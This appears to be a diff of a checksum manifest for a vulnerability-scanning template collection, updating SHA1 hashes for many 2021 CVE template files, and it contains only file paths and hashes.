-http/cves/2021/CVE-2021-20123.yaml:06dd0a1336bfa9a0cc5b7a7cdbd8bb5eb16dee67 -http/cves/2021/CVE-2021-20124.yaml:8f6d64a97faf5bca8268c0cade785d4d21777423 +http/cves/2021/CVE-2021-20123.yaml:48d24969aa100a77fea0602cd3a6548528a2de30 +http/cves/2021/CVE-2021-20124.yaml:47f190dac0033a5442e73ad4c7cd5109506a155b http/cves/2021/CVE-2021-20137.yaml:ed26c4e766913416b746ce9120b823ac448731cb -http/cves/2021/CVE-2021-20150.yaml:f030b3aec588c3516fa85ea706e99828f0eb8ae3 -http/cves/2021/CVE-2021-20158.yaml:2df5bc58c8b70fb20fd2951c188cf2ae530ef447 +http/cves/2021/CVE-2021-20150.yaml:d6727edaf17026b822a3760bf9917cb42e17d0b5 +http/cves/2021/CVE-2021-20158.yaml:b018536b9c1aab1fda3d79f5b9df905d1dc95eab http/cves/2021/CVE-2021-20167.yaml:36cc773bc72b6055133b65b2763ecd8bb5add28e -http/cves/2021/CVE-2021-20323.yaml:e2ae3ace91b06c28d15ae6b10e6b62901c7dc386 +http/cves/2021/CVE-2021-20323.yaml:f6297046bc4b6d1ce16fd2938eb4f914516735c7 http/cves/2021/CVE-2021-20792.yaml:cd40a8ba02194765b10b24575346a4b375a4ad08 -http/cves/2021/CVE-2021-20837.yaml:89fdd31c959b19c2ab1ad7155512d1f12116c318 -http/cves/2021/CVE-2021-21087.yaml:730233b4f2f47bfc53d70c12157c1bc3d92c5349 +http/cves/2021/CVE-2021-20837.yaml:4eaf332c98ac011c89335b6fb50d001f4288d742 +http/cves/2021/CVE-2021-21087.yaml:a7cd31927a59a318181cdb0fd15facdc8e5ff9b6 http/cves/2021/CVE-2021-21234.yaml:1de458d38a523fa3fa8fdb6e08aa4c53f341ce13 -http/cves/2021/CVE-2021-21287.yaml:26e7bb2a7bf595327e4d0c658a991b0c14676092 +http/cves/2021/CVE-2021-21287.yaml:bfb25e027f0b6a0d87347ad4cdedeedd91a3e858 http/cves/2021/CVE-2021-21307.yaml:17e50a4be7be781682f5a2a575ea36ecf9d751a1 -http/cves/2021/CVE-2021-21311.yaml:789dfa603ac943d8f44425a2bf1e11bdc8691254 +http/cves/2021/CVE-2021-21311.yaml:2c4eb2d58c36102c290e9f23408925be20974c42 http/cves/2021/CVE-2021-21315.yaml:70406f1f801ca874413f322d2961c79a8754fb7f http/cves/2021/CVE-2021-21345.yaml:512607ead259d98de98ba7711800d5198a0aa819 http/cves/2021/CVE-2021-21351.yaml:a9ff2618269205226e66ebb73a3b38b61c5c9007 http/cves/2021/CVE-2021-21389.yaml:7a7bf10e2505418f11e6cc1759c83079f3b22e32 -http/cves/2021/CVE-2021-21402.yaml:2bb03c14610bff9ba5bd12c08a0f8e3272a5d84b +http/cves/2021/CVE-2021-21402.yaml:8274cc3e2448360ee951a60e09576c1a8e0acd89 http/cves/2021/CVE-2021-21479.yaml:6576b05e5abc8d3992d561c5217251883e27d8ca http/cves/2021/CVE-2021-21745.yaml:6222c9d2c8645ffaa32de1c39028a28bcd183082 -http/cves/2021/CVE-2021-21799.yaml:810261a9f3c52f574d459fdb0bcac58ac6c2e4ad -http/cves/2021/CVE-2021-21800.yaml:501d15da7f262c1fd1b2f0008e9bc5376cac14ca +http/cves/2021/CVE-2021-21799.yaml:45d017e45cb0be308823fb553a200453d17fe7fe +http/cves/2021/CVE-2021-21800.yaml:0050cd8f7085b5621c59f83410447018b2c4ea94 http/cves/2021/CVE-2021-21801.yaml:c6c41e47254da5e398bb75f06d9f4c3400ca01a0 http/cves/2021/CVE-2021-21802.yaml:c13ebeb4d41efc30f7e13bb5c0f1b4b1b469b79f http/cves/2021/CVE-2021-21803.yaml:84f1528add8b6ffdf91ca8ef5227452f6a37cd77 -http/cves/2021/CVE-2021-21805.yaml:f17ac8d9506bd1afb7b4f33d159f370dbc1011d4 +http/cves/2021/CVE-2021-21805.yaml:230f53f8cbb41f81662e68cd1a2ec4718cfb6268 http/cves/2021/CVE-2021-21816.yaml:520bc9b9b2480f3d3745af02a4a646d3cc95a1bb http/cves/2021/CVE-2021-21881.yaml:314c6a82741362db622de79002bdaaa699d77761 http/cves/2021/CVE-2021-21972.yaml:3cb1d3e5a750dee527ad05a5dde9606adf3534da http/cves/2021/CVE-2021-21973.yaml:853e9759bf3850a3c10bf2d32c0817837c5a9296 http/cves/2021/CVE-2021-21975.yaml:7f5af74dfddf9aad00a337757a5d13c48d2e32a5 http/cves/2021/CVE-2021-21978.yaml:8aabff2e16d6c1a606f7a8131f8c9c4156885355 -http/cves/2021/CVE-2021-21985.yaml:1b01b7d2eeb833de2019b94a5193800fb44cbb7f +http/cves/2021/CVE-2021-21985.yaml:2f35e4d7b38033cf5bd2edaea058541d85391426 http/cves/2021/CVE-2021-22005.yaml:5b561670c55077e8de9fd19c0beb7e5fdb803f4a http/cves/2021/CVE-2021-22053.yaml:fbe006fbc8394b6eacee6ad237dd73da0fb449c4 -http/cves/2021/CVE-2021-22054.yaml:fd67242fd059c9b31bae8d702893caddb3f91a9b -http/cves/2021/CVE-2021-22122.yaml:770a2d406bdd02eef5b8ba737bdcafbac0aab2d4 +http/cves/2021/CVE-2021-22054.yaml:22b837622e4e6fe7a3a451d478b4bde301793837 +http/cves/2021/CVE-2021-22122.yaml:f600bc2607adff7c102b43e8f3bdd104d142d2aa http/cves/2021/CVE-2021-22145.yaml:50c53aa0ad8179ca5c6a3ceca5ee45f75fc39edb -http/cves/2021/CVE-2021-22205.yaml:fb8b6024baefc58a240b46dbc10d5326781d8c80 -http/cves/2021/CVE-2021-22214.yaml:8f12396f57a9d9a68f4a63d08cc05069bc605d51 -http/cves/2021/CVE-2021-22502.yaml:4d61b26a32f0cd9ccece3c2c973bdd4c8c7a5bd0 -http/cves/2021/CVE-2021-22707.yaml:70726c2fcab39ba4e4adebab8e5a21f3af923542 -http/cves/2021/CVE-2021-22873.yaml:3c03414f0a25645f6ff5f411d632d370493abc74 -http/cves/2021/CVE-2021-22911.yaml:bd1fe40a8f4465309c6f59d1f29b96c484ad62df +http/cves/2021/CVE-2021-22205.yaml:dd7d34ea3140a6a6baf35147c157e245a88d1ab6 +http/cves/2021/CVE-2021-22214.yaml:6481474f52b9e7c0ebc4c6d9cacce4fbde4186ab +http/cves/2021/CVE-2021-22502.yaml:8b46e2132dc0614fbfb42f17afbb3c3173a8f9c0 +http/cves/2021/CVE-2021-22707.yaml:4d5b2fc474e1c2ac30a35bcb531ab6800a4c63ca +http/cves/2021/CVE-2021-22873.yaml:f2c46ed872581fed9e3171e004902914a6e5374f +http/cves/2021/CVE-2021-22911.yaml:bddf2e9e45f2a20dfc2e0047541d821c6fb4e975 http/cves/2021/CVE-2021-22986.yaml:1076ec3050b272555fa680391c910a752b03e68a http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 http/cves/2021/CVE-2021-24145.yaml:354af1a704e593bb9efc889f47ce82d30177f92f http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed -http/cves/2021/CVE-2021-24155.yaml:5645db99f6ff5a09395211672d724153f406e85b -http/cves/2021/CVE-2021-24165.yaml:a251469d2e8aa3e9332ba32a8eb8c107b7c64df2 +http/cves/2021/CVE-2021-24155.yaml:7baa8278ca0f996425a52005cb5245f5bd21d924 +http/cves/2021/CVE-2021-24165.yaml:15ba6ec807a57d663deb6b43eddc7ee975d68244 http/cves/2021/CVE-2021-24169.yaml:c21c1c72a9513ec661cf3d6c7934301e52d2940d -http/cves/2021/CVE-2021-24176.yaml:57aa03d9b3ff5dfc7582e3e6e645dd40dba972a7 +http/cves/2021/CVE-2021-24176.yaml:06a34da69a3c9a5a8a921957bad5977ac8823f82 http/cves/2021/CVE-2021-24210.yaml:f3c92e19e3e4ecb701c23031ba681bc0bebbed93 -http/cves/2021/CVE-2021-24214.yaml:fe5a4f0989cbfbaed4f7785c9b7dd6a903427bfa -http/cves/2021/CVE-2021-24215.yaml:53045db44ec88c402e16df51283414b4d3a46cb1 -http/cves/2021/CVE-2021-24226.yaml:4efb3c070813905d4b06f467f0709c1f9cfea511 +http/cves/2021/CVE-2021-24214.yaml:6247a9d54c5cd92d9243524da4b12742c4c91524 +http/cves/2021/CVE-2021-24215.yaml:3fdcb976e793fc02417f1ff4a6f695d14933d3ba +http/cves/2021/CVE-2021-24226.yaml:c100bfe011f7f8ea6f2b9b35f60ccca429ccca2e http/cves/2021/CVE-2021-24227.yaml:8fc4d2d5ed2eb9d6cfe65a19a96d237f7ffab7c5 http/cves/2021/CVE-2021-24235.yaml:b292ae465be4b68e60b77f72a57ccc8563ebf31b http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 http/cves/2021/CVE-2021-24237.yaml:0d3ee3780923885ddc6cffc545df05ff9b5004bd -http/cves/2021/CVE-2021-24239.yaml:b0cc8c039ece07d6a3ac4a6f2464d0c22b57f6d1 -http/cves/2021/CVE-2021-24245.yaml:d1c7c3bf50ad2c2addef9f96df281c9bc2900f67 +http/cves/2021/CVE-2021-24239.yaml:e9cef5565ba4467aed0dd07a9da52b02909c61c0 +http/cves/2021/CVE-2021-24245.yaml:0e67a79742f80c771ab5d8539555f2257615b287 http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 -http/cves/2021/CVE-2021-24275.yaml:6c6a3770c4fc8bebdc3a70c1577a8b9cdd641c58 -http/cves/2021/CVE-2021-24276.yaml:afb8ce90ecfaa0e422d14c34849b5be1d89bd0bf +http/cves/2021/CVE-2021-24275.yaml:514a8801aa18c9bbcb9fe480ba6ca5dd860d6b96 +http/cves/2021/CVE-2021-24276.yaml:9bbb2fb271eb1f2ea7155dd56a439f8beb2615ff http/cves/2021/CVE-2021-24278.yaml:0b2dc1146c6f6e6e271dc39b3f043f9c68eb69a4 -http/cves/2021/CVE-2021-24284.yaml:4d005ae351ac988b0dabdd7ba7ce112a7d2a400f +http/cves/2021/CVE-2021-24284.yaml:320cd58fb32ce3bf15831935acb3b2ebfd82f63d http/cves/2021/CVE-2021-24285.yaml:92ccc610fac04483e22bf7475143c25140218d39 http/cves/2021/CVE-2021-24286.yaml:4fc77bc8752808ae5219d482ff86de500e673399 http/cves/2021/CVE-2021-24287.yaml:301c22e8fc62be986b55d8c632c971ada3634f04 http/cves/2021/CVE-2021-24288.yaml:906f67ef2610bde07a1372beec43f666d94e7646 -http/cves/2021/CVE-2021-24291.yaml:fd532bc987e02fcc2a187ad4266d910b87389981 -http/cves/2021/CVE-2021-24298.yaml:1c02c80458f6f8a16841c7c774c2a07b5d2dd186 +http/cves/2021/CVE-2021-24291.yaml:e60f04204f08227257649a50373a0ae838b7b2d9 +http/cves/2021/CVE-2021-24298.yaml:83c2d4fc26b29840f65d6e726119d30c51f7e2aa http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 http/cves/2021/CVE-2021-24316.yaml:4f664d0815cacf39455233fb049ba50fdab01c16 -http/cves/2021/CVE-2021-24320.yaml:9dafc796b3510ad1552851e657db09861c8bee92 -http/cves/2021/CVE-2021-24335.yaml:be3166a127fe3d9d9bfebcd4f4030bd692443efd -http/cves/2021/CVE-2021-24340.yaml:bb330b5e7346d2ebe8673b5e40567f5250057a48 -http/cves/2021/CVE-2021-24342.yaml:fa1849c17234768aeea039427eef631fe408f0d1 +http/cves/2021/CVE-2021-24320.yaml:3312ea66f29708c1561b438f9a541a5db5eabb24 +http/cves/2021/CVE-2021-24335.yaml:5985b81cfbe36c531356bfdf68f256254da8cc15 +http/cves/2021/CVE-2021-24340.yaml:29aa23594a737a65d066809ad76c5687dd47ad17 +http/cves/2021/CVE-2021-24342.yaml:ceb84cbf1d8ac8deb20a33fa994079cad1ab3ef5 http/cves/2021/CVE-2021-24347.yaml:6c90d296d8416631ebaf7ece4b121eaf79c098e6 http/cves/2021/CVE-2021-24351.yaml:10a1c630459cf99435e71b00505c5f64595ed030 http/cves/2021/CVE-2021-24358.yaml:c7df8e26c19cfe2aa54d24d3fa8455d52b1698a1 -http/cves/2021/CVE-2021-24364.yaml:08a1345143718817545b4abe60635d5630a0c956 +http/cves/2021/CVE-2021-24364.yaml:71b1d8b56e1c683a65cf491d40dc84bc325c7f0e http/cves/2021/CVE-2021-24370.yaml:480c194476d40e71e0f58139dbac79cfcca559ba -http/cves/2021/CVE-2021-24387.yaml:8bf0dbde8e34c930d2e2c2c10ec346cece322042 +http/cves/2021/CVE-2021-24387.yaml:3ce822a1c6da0c2970d9c8ece5f571678fc193e0 http/cves/2021/CVE-2021-24389.yaml:42ad59611f74158ae872570a997c48530f1b987f http/cves/2021/CVE-2021-24406.yaml:619168311788c421c9975c3b5285c06ade2c2dd7 -http/cves/2021/CVE-2021-24407.yaml:db40b2349077bceb7bc32089a660352fa44195b9 -http/cves/2021/CVE-2021-24409.yaml:ed9d3235d3ddf23abc8e23c64729c028bad3322c +http/cves/2021/CVE-2021-24407.yaml:fe029204152f2943f3231dcdc56772b13a6a0fbe +http/cves/2021/CVE-2021-24409.yaml:ba7434588afb313756f4475dae0f1d7c010319d4 http/cves/2021/CVE-2021-24435.yaml:c2ec5e562bcc640a38deddebca4c7164b15f81bd http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:6459ff5b29d79cd08ba6cac17f5311d4068c919a +http/cves/2021/CVE-2021-24442.yaml:686b0519667c9157586828bec2956ab56ae9b4f7 http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a -http/cves/2021/CVE-2021-24472.yaml:654cbf9327ca455c2a5862e23b7018b2602c6e62 +http/cves/2021/CVE-2021-24472.yaml:9d3d39323b308169053d75f81cfbbc324299f3ee http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 http/cves/2021/CVE-2021-24495.yaml:f4ecb1cb80b358b63faff083eccb92434ff2e6b9 http/cves/2021/CVE-2021-24498.yaml:2dab1759f9177c9b511cc29caefbff8a3e30778f http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 http/cves/2021/CVE-2021-24510.yaml:1e931f035d2345ecff4c534cfcef28fae8345c1d http/cves/2021/CVE-2021-24554.yaml:e8341b35b6ad3ccd1b33edbffe1f61b464d6700d -http/cves/2021/CVE-2021-24627.yaml:eb7178b5973b0b80b05a8021e420433428fe5664 +http/cves/2021/CVE-2021-24627.yaml:e572f60f822aa60621dd9bca61f290b90e96a6c4 http/cves/2021/CVE-2021-24647.yaml:18c9d01f297fb0807334189d6e0c67dc881f6026 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac http/cves/2021/CVE-2021-24731.yaml:6d56d8b4ce11d8c5416a2dc8a8ec0557b507e515 @@ -2077,38 +2077,38 @@ http/cves/2021/CVE-2021-24746.yaml:aaf375e2396c121de2a64543991c8850586bd8b4 http/cves/2021/CVE-2021-24750.yaml:33880dabf05f52290bc3bdf6ef6a71dbccbe0005 http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 -http/cves/2021/CVE-2021-24827.yaml:c975ee107fff6c87a105398623a2a2efc3ca1c26 +http/cves/2021/CVE-2021-24827.yaml:30683918ed245e88d7562add1a91eb55c6c60fe8 http/cves/2021/CVE-2021-24838.yaml:b0bc77f4126c393b78150ec6e3e6d3840c40a071 -http/cves/2021/CVE-2021-24849.yaml:7b94e7f4a138fba106ba20a6c7ee138bea2da37c +http/cves/2021/CVE-2021-24849.yaml:4b6cc6305f5265004d22f577ae7c7e0c3c3fe12b http/cves/2021/CVE-2021-24862.yaml:78adc2493ed043de4466a990011b3bc4f7c88fe6 http/cves/2021/CVE-2021-24875.yaml:78d31d54bfac674a34ecad0bbd7024aeb87c765c -http/cves/2021/CVE-2021-24891.yaml:eb99b2eef9374403d175172cc2c510035e765653 +http/cves/2021/CVE-2021-24891.yaml:da070777de9d0eaa30836a42f8c121f606a60074 http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 -http/cves/2021/CVE-2021-24915.yaml:f172d25495f925b1584e57635e9fdf509ac07c6e +http/cves/2021/CVE-2021-24915.yaml:71b89a43ddc912b496a3573c6700b12b9d1707a8 http/cves/2021/CVE-2021-24917.yaml:c266a0fdaa11d4845b599de67c8a7943380fa539 http/cves/2021/CVE-2021-24926.yaml:10bf105c8ef639ba7fc985d7954915b69c33c4b1 http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 http/cves/2021/CVE-2021-24940.yaml:0481cbee1ce19ae7674a23128f0e1925164db6a7 -http/cves/2021/CVE-2021-24943.yaml:93a210391c6908d475e434c178a1cc8e0c82cd6d +http/cves/2021/CVE-2021-24943.yaml:698d72411a74fef8cd89a5958eff7870fc010129 http/cves/2021/CVE-2021-24946.yaml:5f09eec0c936dce40c7b346e73d3ab1e555b8026 http/cves/2021/CVE-2021-24947.yaml:f91652cde78faaf0de5409ca19253ddd1ad4f11b http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 http/cves/2021/CVE-2021-24970.yaml:fe2f26a13278d271e48a316d9826bf197e66d730 -http/cves/2021/CVE-2021-24979.yaml:2dcd72ccf920004757c807bf57b2012b9589ef38 +http/cves/2021/CVE-2021-24979.yaml:9e298267b508ca15f42487dc865485dc4ceada8a http/cves/2021/CVE-2021-24987.yaml:06ec87f0d9dad1a08870b903b897645a4114cca6 http/cves/2021/CVE-2021-24991.yaml:4bc4eec76c21b3f68454f49c72adff65d3a817b5 -http/cves/2021/CVE-2021-24997.yaml:570633d39e265ed69286a27f334de11570eae432 +http/cves/2021/CVE-2021-24997.yaml:989e9041d5c0bada5a1f3144530679ff870d7f99 http/cves/2021/CVE-2021-25003.yaml:f85acfb13bf701684d4fe91b81e2217b30c9eb94 http/cves/2021/CVE-2021-25008.yaml:e2bd2d41b569468489e3745dd421c1a15577402e -http/cves/2021/CVE-2021-25016.yaml:7e5db140a5e15d6c4f566e9fa79633d79f43c95f +http/cves/2021/CVE-2021-25016.yaml:982818ff92bf56a79c7a61a3f06e07d73b216a4a http/cves/2021/CVE-2021-25028.yaml:533752557ff220a1bd422d2fb856f1ffb91b9969 http/cves/2021/CVE-2021-25033.yaml:8768311c117a0653e7cc5c8a4cc75d0769cee3c8 http/cves/2021/CVE-2021-25052.yaml:8dd5740bf3f98413a43c07b460940805e897ad52 -http/cves/2021/CVE-2021-25055.yaml:b2693690809e35e621974fbdd3f9cdcee3e81586 +http/cves/2021/CVE-2021-25055.yaml:5ad549db7717f5dbeb75e6c3297e7d11b30c3d0c http/cves/2021/CVE-2021-25063.yaml:e0bfef38d39cfee9f885137ec3d3cb0a7565d712 -http/cves/2021/CVE-2021-25065.yaml:cf7519269a965b59df933825b1d8a1eadf515bb1 +http/cves/2021/CVE-2021-25065.yaml:6a358ebe8402368db7990bc7e2d1c72fbf90c745 http/cves/2021/CVE-2021-25067.yaml:51479ec179abace5e91c9513c221d45abb98ed25 -http/cves/2021/CVE-2021-25074.yaml:0c2ee3fab033f99015e9963c3a329debca9b934b +http/cves/2021/CVE-2021-25074.yaml:ba94f8fc11a40dd45a0d6b9b3900307573a7c4e0 http/cves/2021/CVE-2021-25075.yaml:e47f941254f36267b1c9187f43bee0596e1d31a0 http/cves/2021/CVE-2021-25078.yaml:d7e219fd39f415ccd30398b2bb8cea67897fa1f3 http/cves/2021/CVE-2021-25079.yaml:18d97db163ecd42a7224f6e1e1a6a4ac9aeac16f @@ -2117,56 +2117,56 @@ http/cves/2021/CVE-2021-25099.yaml:9c14323218b138b43e2196b0d9665aaef686f140 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 http/cves/2021/CVE-2021-25111.yaml:ba58695551c73cbccfd585cb8bb325f9558843b6 http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:7049b12767bd0f607abe013c91a9cc0c7bd9e996 +http/cves/2021/CVE-2021-25114.yaml:44442d02ad58b98a1f46118f9b7a26335dc3bcce http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:17afacb43d764c45b4c11ef9151650d2cad6cfe2 http/cves/2021/CVE-2021-25281.yaml:79d1459249cba40c4206e09d5ef25896ec77d5e5 -http/cves/2021/CVE-2021-25296.yaml:1178f6b1950424cebdc097a1c83cfd1e8c951a84 -http/cves/2021/CVE-2021-25297.yaml:9738fb22f47e59bacf12acda843d5db83a5e5e5e -http/cves/2021/CVE-2021-25298.yaml:2e124dfc590672ee3d17a3571c5f73115e91a642 -http/cves/2021/CVE-2021-25299.yaml:acc2fc12b9e87c52a3a270b141f1e617bdeb7aba +http/cves/2021/CVE-2021-25296.yaml:c7f2d5fb7886b2bad48676974d433e4e22d9b6f8 +http/cves/2021/CVE-2021-25297.yaml:3c9df685cc37d6e531d22d71f9bbea14c94b58f7 +http/cves/2021/CVE-2021-25298.yaml:3bdaa13b713bbb10748332fc35f8d91d0c4e156f +http/cves/2021/CVE-2021-25299.yaml:acba2a33e97b6e1dfa0b411e0174bc05824010a8 http/cves/2021/CVE-2021-25646.yaml:38bddfd4767c88b7a9adef79e7dd77f2b6b497ff -http/cves/2021/CVE-2021-25864.yaml:b98295af9c4ce976d3357ba5af76506dd9673a67 -http/cves/2021/CVE-2021-25899.yaml:09f6d90d362c88a063ff646cc2f97f95c632521c -http/cves/2021/CVE-2021-26084.yaml:71162e0c302190ddf12bd46130048c23d759b35b -http/cves/2021/CVE-2021-26085.yaml:fb17fe8c8c7c599cde52b8d377ab3bca36339f1e -http/cves/2021/CVE-2021-26086.yaml:e70ee11152a8acbf16d9d2264ad3695d1aa38c55 -http/cves/2021/CVE-2021-26247.yaml:d85b58689b6161c64bc5c01f03a32afb8117e22e -http/cves/2021/CVE-2021-26292.yaml:c7a60179f7c1e85b22df9a7987a51d740e85d7c6 -http/cves/2021/CVE-2021-26294.yaml:9426124355dfc278225fd06015965b1d0bcc0290 -http/cves/2021/CVE-2021-26295.yaml:ac77e9eaa39f90db27a6a90a58479ec1ec9f4b7f +http/cves/2021/CVE-2021-25864.yaml:ef18020f6293591d6d4a6cca295555777777b889 +http/cves/2021/CVE-2021-25899.yaml:e7603dd4df43ead58e24ef91e4e0f610250ca419 +http/cves/2021/CVE-2021-26084.yaml:116be72a0be50b6b02223d4aeb391b360e85d957 +http/cves/2021/CVE-2021-26085.yaml:c4f194b24fac2b1847d554e44375f3f8c5c41aef +http/cves/2021/CVE-2021-26086.yaml:ecc9c439b0d73d2386dce1692e5066fa9a48807a +http/cves/2021/CVE-2021-26247.yaml:731bbbacce057b81a81dec2e08cee747d6116d11 +http/cves/2021/CVE-2021-26292.yaml:006e736220248110fd6a281344a0d888026175a2 +http/cves/2021/CVE-2021-26294.yaml:193a442bfd828241c5b49a1e7e11320794250b8c +http/cves/2021/CVE-2021-26295.yaml:9f956f5ad5943d9137b68ad426a09e605b3fe274 http/cves/2021/CVE-2021-26475.yaml:287c333e6e6c35e539e84260d37699f19044b24b -http/cves/2021/CVE-2021-26598.yaml:de58b26112ae5c021a4e844ba78da4a0fbb06de3 +http/cves/2021/CVE-2021-26598.yaml:213f00acc65af23764bbce375fd47992be48e0c3 http/cves/2021/CVE-2021-26702.yaml:eb202f4e53a83dd20ad98f8cbd4158d66c60fed5 http/cves/2021/CVE-2021-26710.yaml:ef7eb66ac883942d63f1343399937aa1dca8f788 http/cves/2021/CVE-2021-26723.yaml:00ec7edcbdeaccdac3537404c8d6c7c3f5c01ca4 http/cves/2021/CVE-2021-26812.yaml:3250f33a0d0ac1fc31b614df064b199abfb9aa84 -http/cves/2021/CVE-2021-26855.yaml:e0b1a005f2ce9861001a1a09be6f4bec31ee62af +http/cves/2021/CVE-2021-26855.yaml:5d21d19f9816729983fef5278b72186b7b3b87af http/cves/2021/CVE-2021-27124.yaml:c5733fec98010b27de00dee5c3b7a7dbc1c5ae3d http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f http/cves/2021/CVE-2021-27309.yaml:c0a0e164a992636c4d75f5c5a48093382a4a0861 -http/cves/2021/CVE-2021-27310.yaml:b4899b2a06e280c5fdd34795040962d3126f27df +http/cves/2021/CVE-2021-27310.yaml:36c147786b7124bac2e19cbc486d42f15381201e http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c http/cves/2021/CVE-2021-27315.yaml:a35e2b21d64664b1dc1b051b9aebe2c0d8bbea9a http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 http/cves/2021/CVE-2021-27319.yaml:b785025398590a56aed4ddf2ded77eb580bf4c39 http/cves/2021/CVE-2021-27320.yaml:4316c2de8def2bfa92ed880cfcee4a994e548b67 -http/cves/2021/CVE-2021-27330.yaml:340cef397d60dd127fa5472b2337b351b6b1b618 -http/cves/2021/CVE-2021-27358.yaml:6cc74d204fce5604ff87cb9ca03b6dbb0bee4ce8 -http/cves/2021/CVE-2021-27519.yaml:d426f350b23221b3e952714f367dceea25bee73e -http/cves/2021/CVE-2021-27520.yaml:5783ca7bcadd97b20a2e43b8951033cc7f375d0c +http/cves/2021/CVE-2021-27330.yaml:b3cbfe9873da2920ead577ece056ac018736d8bd +http/cves/2021/CVE-2021-27358.yaml:fd6de06bd7e7ca34585598ffee4fbe08fe755adc +http/cves/2021/CVE-2021-27519.yaml:e2aae4f809456fa60fb3ed1302a1cfe80155d822 +http/cves/2021/CVE-2021-27520.yaml:05c3fd807ea8b3c7b1d632253b5a368169a91caa http/cves/2021/CVE-2021-27561.yaml:4466d02ccd5225c530894a23f7271a4e52927715 http/cves/2021/CVE-2021-27651.yaml:d4495c5c75916c88ebcfc6963aedcc1ac85c0c68 -http/cves/2021/CVE-2021-27670.yaml:e733bd5dbf959f04064931b6c390a390a4ec4f5b +http/cves/2021/CVE-2021-27670.yaml:890d6f59fb56bee4bbf883103ecb21329a55cc96 http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 http/cves/2021/CVE-2021-27850.yaml:64ecfed4708d7c2dc35acd4db916dbc2eb32ad74 -http/cves/2021/CVE-2021-27905.yaml:bc0696a90dd8beb4b801e9a55edf8f1ca3b0723c -http/cves/2021/CVE-2021-27909.yaml:dd562c3aa5434371e145600408ab26a5c23b4ca3 +http/cves/2021/CVE-2021-27905.yaml:6d4e98b59983d2c21da912216d49bcd0c88a5cfc +http/cves/2021/CVE-2021-27909.yaml:1fadaf13dcd7e7bf8b63822844518fe529f59af2 http/cves/2021/CVE-2021-27931.yaml:52bce3b2966d95aaf19fbfc72760e749b05c862c http/cves/2021/CVE-2021-28073.yaml:b69885510093cff31b667b35c1004583ec9fbbf2 http/cves/2021/CVE-2021-28149.yaml:0a69b168f8c598056a57c29b2c4225737cb83bf0 http/cves/2021/CVE-2021-28150.yaml:a0787ef21b7d8d7d5f984f378d7bd37f54bdaeaa -http/cves/2021/CVE-2021-28151.yaml:61efb4bdfbc96e3d49f200feb4b57d3a017e6b62 +http/cves/2021/CVE-2021-28151.yaml:5b7849811af0aac5ac7c68f11984802d5c136327 http/cves/2021/CVE-2021-28164.yaml:5dd4e3ae65a8c4ccc087ee45dc6c1039457fe244 http/cves/2021/CVE-2021-28169.yaml:37da3586f6f8475da6f63596d5cbf578af370502 http/cves/2021/CVE-2021-28377.yaml:0c0306f01abbec5444d522510bc897cea44339c7 @@ -2174,60 +2174,60 @@ http/cves/2021/CVE-2021-28419.yaml:06dd2715d496bb243207a231a5c63d7b1de18d6f http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 http/cves/2021/CVE-2021-28937.yaml:bd90f9666ffbbd6f1911cf7d3e92bcd7b10db395 -http/cves/2021/CVE-2021-29006.yaml:080f5ac49a6458ac4677d08bcb100305c1690f6f -http/cves/2021/CVE-2021-29156.yaml:1c5b14b8dbf5b3392cd9f4d9f904d3291baeee35 -http/cves/2021/CVE-2021-29200.yaml:e0d5b8886c05aac84d76fb90b5e3f347fd173148 +http/cves/2021/CVE-2021-29006.yaml:6a47f81e995030df3fce9f72ed15cf6b19c98363 +http/cves/2021/CVE-2021-29156.yaml:570e88dbe2cc4a6c69bfd54d14d03257ed11e0ce +http/cves/2021/CVE-2021-29200.yaml:bfdbebf240ee8f7dfa4039428ce34c5e204dce6f http/cves/2021/CVE-2021-29203.yaml:097c5d57566606d4908f10ef8f557c2dbadc1684 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 http/cves/2021/CVE-2021-29442.yaml:818804dfe3d7008e6c615567ed874e1f3b45d2d9 -http/cves/2021/CVE-2021-29484.yaml:6b2a1e0cfb266417ac5045a3da7e3bb5667210c9 +http/cves/2021/CVE-2021-29484.yaml:a3b3b928c2e8092ad7c1b157eb28ac782c9216ff http/cves/2021/CVE-2021-29490.yaml:da69b66fb55d67c32fb427d0c225e726f3ca7fbe 